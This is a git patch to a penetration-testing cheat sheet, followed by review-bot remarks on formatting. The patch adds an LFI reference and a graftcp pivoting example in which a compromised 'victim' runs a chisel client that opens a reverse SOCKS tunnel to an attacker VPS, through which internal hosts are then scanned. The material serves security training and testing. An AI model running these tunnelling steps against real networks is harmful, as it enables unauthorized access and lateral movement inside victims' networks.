From c9ef8f7f4935e789ec2afcfb35e318a2b7b9d206 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 29 Dec 2021 18:16:26 +0100 Subject: [PATCH] Graftcp Cheatsheet --- File Inclusion/README.md | 1 + .../Network Pivoting Techniques.md | 40 +++++++++++++++---- 2 files changed, 34 insertions(+), 7 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index cc4a67f..0e6c0b5 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -433,3 +433,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) +* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 670fae3..68a6197 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md 
@@ -82,17 +82,43 @@ socks4 localhost 8080 Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6` -## Graphtcp +## Graftcp -Same as proxychains, with another mechanism to "proxify" which allow Go applications. +> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy. -```powershell -git clone https://github.com/hmgle/graftcp.git -cd graftcp && make -graftcp-local/graftcp-local -./graftcp chromium-browser +:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications. + +```ps1 +# https://github.com/hmgle/graftcp + +# Create a SOCKS5, using Chisel or another tool and forward it through SSH +(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS +(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse +(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks + +# Run graftcp and specify the SOCKS5 +(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080 +(attacker) $ graftcp ./nuclei -u http://172.16.1.24 ``` +Simple configuration file for graftcp + +```py +# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf +## Listen address (default ":2233") +listen = :2233 +loglevel = 1 + +## SOCKS5 address (default "127.0.0.1:1080") +socks5 = 127.0.0.1:1080 +# socks5_username = SOCKS5USERNAME +# socks5_password = SOCKS5PASSWORD + +## Set the mode for select a proxy (default "auto") +select_proxy_mode = auto +``` + + ## Web SOCKS - reGeorg [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
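Review bot: the `File Inclusion/README.md` hunk ends with `\ No newline at end of file` after the added `PHP LFI with Nginx Assistance` line, so the new last line drops the trailing newline that the file previously had. Please add the newline so the next contributor who appends a reference does not produce a diff that touches this line again, and so line-based tools (`cat`, `wc -l`, `grep -c`) count the entry correctly.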
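Review bot: in the `Network Pivoting Techniques.md` hunk the two code fences are tagged with the wrong languages: the `ssh` / `chisel` / `graftcp` session is fenced as ` ```ps1 ` although every command is typed into a Unix shell, and the INI-style `graftcp-local` configuration is fenced as ` ```py `. Suggest ` ```bash ` for the first block and ` ```ini ` (or an untagged fence) for the second so the rendered page highlights them correctly. Two smaller points in the same hunk: the warning line should read "which allows Go applications" (or "which also works with Go applications"), and the removed `git clone https://github.com/hmgle/graftcp.git` / `cd graftcp && make` lines were the only build instructions on the page; since both `graftcp` and `graftcp-local` have to be compiled before the `(attacker) $ graftcp-local -listen :2233 ...` step can run, consider keeping a one-line install step above the new example. The example's hard-coded `-logfile /tmp/toto` would also be clearer as an obviously named placeholder such as `/tmp/graftcp.log`.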